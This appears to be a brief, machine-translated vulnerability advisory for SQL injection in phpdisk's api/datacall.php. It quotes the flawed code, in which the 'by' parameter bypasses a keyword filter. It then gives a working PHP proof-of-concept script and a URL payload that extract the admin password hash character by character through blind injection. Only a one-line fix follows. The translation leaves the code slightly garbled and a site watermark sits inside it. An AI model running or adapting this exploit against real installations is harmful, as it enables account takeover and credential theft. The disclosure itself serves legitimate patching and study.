In phpdisk/api/datacall. php has a piece of code: $ order = trim (gpc ('order', 'G', ''); $ by = trim (gpc ('by', 'G ', ''); $ limit = (int) gpc ('limit', 'G', 0); if (! $ Type |! $ Order |! $ By |! $ Limit) {echo 'phpdisk Datacall Parameter is null or Error! '; Exit;} $ filter_arr = array ('select', 'delete', 'update', 'insert'); for ($ I = 0; $ I <count ($ filter_arr); $ I ++) {if (strpos ($ order, strtolower ($ filter_arr [$ I])! = False) {die ('phpdisk Datacall Parameter Error! ') ;}} If ($ type = 'user') {echo' <ul> '. LF; $ q = $ db-> query ("select username, userid from {$ tpf} users order by $ order $ by limit $ limit "); $ order and $ by entered the query. The author thought that someone may submit the query in order, but he did not expect to submit the order, the same can be submitted in. Vulnerability proof: <? Php $ file =' http://localhost/phpdisk/api/datacall.php '; For ($ I = 0; $ I <32; $ I ++) {$ path = $ I + 1; foreach (array ('A',' B ', 'C', 'D', 'E', 'F',) as $ w) {$ api = $ file. '? Type = user & by = '. urlencode ('(if (select substring (password ,'. $ path. ', 1) from pd_users where userid = 1) = 0x '. bin2hex ($ w ). '), userid, username ))'). '& order =/**/& limit = 1'; if (strpos (file_get_contents ($ api), 'admin ')! = False) {echo $ w; break;} www.2cto.com }}// http://localhost/phpdisk/api/datacall.php ? Type = user & by = if % 28% 28% 28 select % 201% 20 from % 20pd_users % 20 where % 20 userid = 1% 20 limit % 201% 29 = 2% 29, userid, username % 29 & order =/**/& limit = 1?>Solution:Only order and by of a-z are allowed